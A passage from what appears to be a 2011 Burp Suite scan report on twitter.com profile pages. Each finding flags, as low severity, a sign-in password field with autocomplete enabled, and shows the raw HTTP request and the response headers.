Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-87220-8975
ETag: "04df87e3f545648158c89bbf858582e1"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01098
Content-Type: text/html; charset=utf-8
Content-Length: 40483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.35. http://twitter.com/BosHerald_Edge/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /BosHerald_Edge/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /BosHerald_Edge/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-63986-28033
ETag: "94982feeb68a0a8cb68c04820be2cd8d"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00768
Content-Type: text/html; charset=utf-8
Content-Length: 52761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.36. http://twitter.com/ChrisLambton13

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ChrisLambton13

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ChrisLambton13 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:51:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265908-61244-34588
ETag: "2188d703ab23d0ac8a30be86c7dd57e4"
Last-Modified: Sat, 29 Jan 2011 01:51:48 GMT
X-Runtime: 0.01239
Content-Type: text/html; charset=utf-8
Content-Length: 50278
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="8dd194bf30f7b0f6e976b30cbb6690a3f1bcc0a4" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.37. http://twitter.com/ConanOBrien

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ConanOBrien

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ConanOBrien HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-23118-1747
ETag: "86f99f7437978cad54926bacf38c847f"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01272
Content-Type: text/html; charset=utf-8
Content-Length: 36266
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2c7a78d940e43565b81950bf2ea6a02ce9ec1091" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.38. http://twitter.com/DustinPedroia15

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /DustinPedroia15

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /DustinPedroia15 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266020-27916-18382
ETag: "e0a2dddf6e04f8631a548ec38cc9be5b"
Last-Modified: Sat, 29 Jan 2011 01:53:40 GMT
X-Runtime: 0.01575
Content-Type: text/html; charset=utf-8
Content-Length: 29153
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.39. http://twitter.com/ExpertDan

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ExpertDan

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225052-83422-12297
ETag: "71df0fbad70a67fb009c57f7a62454f1"
Last-Modified: Fri, 28 Jan 2011 14:30:52 GMT
X-Runtime: 0.01535
Content-Type: text/html; charset=utf-8
Content-Length: 53009
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="fd8c2c9668f7f0442e2f084aa7a991f5aecbfc1f" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.40. http://twitter.com/GQMagazine

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /GQMagazine

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /GQMagazine HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265974-66159-11366
ETag: "0c7b3f1ee02a220dddae84a56bd4dae8"
Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT
X-Runtime: 0.01364
Content-Type: text/html; charset=utf-8
Content-Length: 51000
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="4452c14a8ab390c56dcdc13dde4b57fb4697caaa" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.41. http://twitter.com/Gr8BosFoodBank

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Gr8BosFoodBank

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Gr8BosFoodBank HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-79208-29747
ETag: "a6d77c28a643e235a002a7eb55dd8452"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00773
Content-Type: text/html; charset=utf-8
Content-Length: 53288
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="4278e2e12b9ff7a5cc06478449bb7ca939c153c9" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.42. http://twitter.com/Harvard

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Harvard

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Harvard HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265976-30452-57191
ETag: "f592e2869b28d974ff30653c3b748799"
Last-Modified: Sat, 29 Jan 2011 01:52:56 GMT
X-Runtime: 0.01723
Content-Type: text/html; charset=utf-8
Content-Length: 51819
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
